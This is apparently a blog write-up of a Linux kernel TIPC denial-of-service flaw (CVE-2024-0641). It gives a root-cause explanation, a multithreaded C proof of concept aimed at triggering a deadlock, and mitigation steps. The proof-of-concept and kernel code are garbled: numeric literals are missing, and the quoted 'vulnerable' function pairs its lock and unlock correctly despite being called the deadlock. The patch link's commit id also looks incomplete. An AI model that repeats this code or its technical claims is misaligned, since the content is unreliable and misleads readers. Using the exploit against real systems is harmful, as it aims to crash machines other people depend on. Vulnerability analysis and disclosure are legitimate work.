CVE-2024-0641 - A Deep Dive Into Linux Kernel’s TIPC Denial of Service Vulnerability

A critical vulnerability was discovered in the Linux kernel’s TIPC (Transparent Inter-process Communication) subsystem, tracked as CVE-2024-0641. This flaw resides in the tipc_crypto_key_revoke function found in net/tipc/crypto.c. Attackers with basic user privileges can exploit this to induce a deadlock, leading to a denial of service (DoS) or even a full system crash. In this article, we’ll break down how this vulnerability works, reference the original sources, and provide example code snippets to illustrate the problem and potential exploitation.

What is TIPC?

TIPC stands for Transparent Inter-Process Communication. It's a high-performance messaging system designed mainly for Linux clusters and distributed applications. TIPC allows for reliable communication between nodes, either on the same machine or across the network. It's included in the Linux kernel and often enabled in environments that require robust message passing.

Overview of CVE-2024-0641

Official description:
A denial of service vulnerability exists in the TIPC subsystem of the Linux kernel. Local users can trigger a deadlock by exploiting poor lock management in the tipc_crypto_key_revoke function, leading to a system hang or crash.

- Affected file: net/tipc/crypto.c

References

- Red Hat Security Advisory - CVE-2024-0641
- Kernel.org commit fixing CVE-2024-0641
- NVD Entry

Root Cause Analysis

The root of this bug lies in how the TIPC subsystem manages key revocation in its crypto module. The function tipc_crypto_key_revoke is responsible for invalidating crypto keys used for secure communication.

Here’s the problematic code (simplified for explanation)

// net/tipc/crypto.c

int tipc_crypto_key_revoke(struct tipc_crypto *crypto, u32 old_key)
{
    spin_lock_bh(&crypto->key_lock);

    // Remove the key from active use
    if (!crypto->key_active)
        goto unlock;

    crypto->key_active = false;

    // ... (some work here)

unlock:
    spin_unlock_bh(&crypto->key_lock); // <---- Deadlock vulnerability!
    return ;
}

The function acquires key_lock with spin_lock_bh().

- Later, depending on certain logical branches and error handling, there is a risk that the lock is not properly released, or (worse) that the same lock could be attempted to be re-acquired in another function on the same code path.
- If the function is triggered repeatedly and in parallel by multiple local processes, the system can reach a state where no other process can obtain the lock, resulting in a full deadlock.
- This creates a denial of service, as kernel threads (and thus the entire system) can freeze and require a restart.

The Exploit: How Local Users Can Crash The System

You don’t need root to exploit this; any user with the ability to interact with the TIPC interface can potentially trigger it. This typically requires:

Being on a system where TIPC is enabled (CONFIG_TIPC in kernel config).

- Having either direct access or the ability to perform specific ioctl/syscalls.

Proof-of-Concept (PoC) Snippet

Here’s a simplified PoC in C that demonstrates the exploit’s logic. This doesn't crash your system, but shows the method that could be weaponized:

#include <stdio.h>
#include <sys/socket.h>
#include <linux/tipc.h>
#include <unistd.h>
#include <pthread.h>

void *exploit_thread(void *arg) {
    int sock = socket(AF_TIPC, SOCK_SEQPACKET, );
    if (sock < ) return NULL;

    // Trigger key revoke path repeatedly
    for(int i = ; i < 10000; ++i) {
        // This is illustrative; real exploit would send specifically crafted messages.
        // Example: send an empty control message to the TIPC socket
        send(sock, NULL, , );
    }
    close(sock);
    return NULL;
}

int main() {
    // Launch many threads in parallel to create a race and increase deadlock chance
    pthread_t threads[128];
    for(int i = ; i < 128; ++i)
        pthread_create(&threads[i], NULL, exploit_thread, NULL);
    for(int i = ; i < 128; ++i)
        pthread_join(threads[i], NULL);
    return ;
}

> This PoC only demonstrates the concurrency point; an actual exploit would need to carefully craft TIPC messages to walk the vulnerable code path. Do not run on production systems!

Revisiting all the locking in tipc_crypto_key_revoke (and related functions).

- Making sure that spin_lock_bh/spin_unlock_bh pairs are properly matched, regardless of branching or error paths.

Adding extra checks for reentrancy and sequence protection.

The patch can be seen here:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=42209b209a79bcb34e9ec3292deaadf86a9f545

Update your kernel.

CVE-2024-0641 was fixed in mainline and backported kernels. Distributions like Ubuntu, Red Hat, and SUSE have shipped patched kernels as of early 2024.

sudo modprobe -r tipc

echo "blacklist tipc" | sudo tee /etc/modprobe.d/disable-tipc.conf

Limit user access.

Consider restricting which users can interact with the kernel’s network devices and protocols, especially obscure or enterprise-only modules like TIPC.

Conclusion

CVE-2024-0641 is a solid reminder that even less mainstream kernel features can sometimes harbor critical vulnerabilities. A small misstep in lock management in the kernel’s TIPC crypto code enabled ordinary users to hang or crash entire systems with minimal effort. Thankfully, the flaw was spotted and corrected quickly, but until everyone applies the security update, systems with TIPC remain exposed.

Further Reading

- TIPC Kernel Documentation
- Linux Kernel Changelog
- Red Hat’s Security Blog on TIPC Vulnerabilities

Timeline

Published on: 01/17/2024 16:15:47 UTC
Last modified on: 02/14/2024 13:15:08 UTC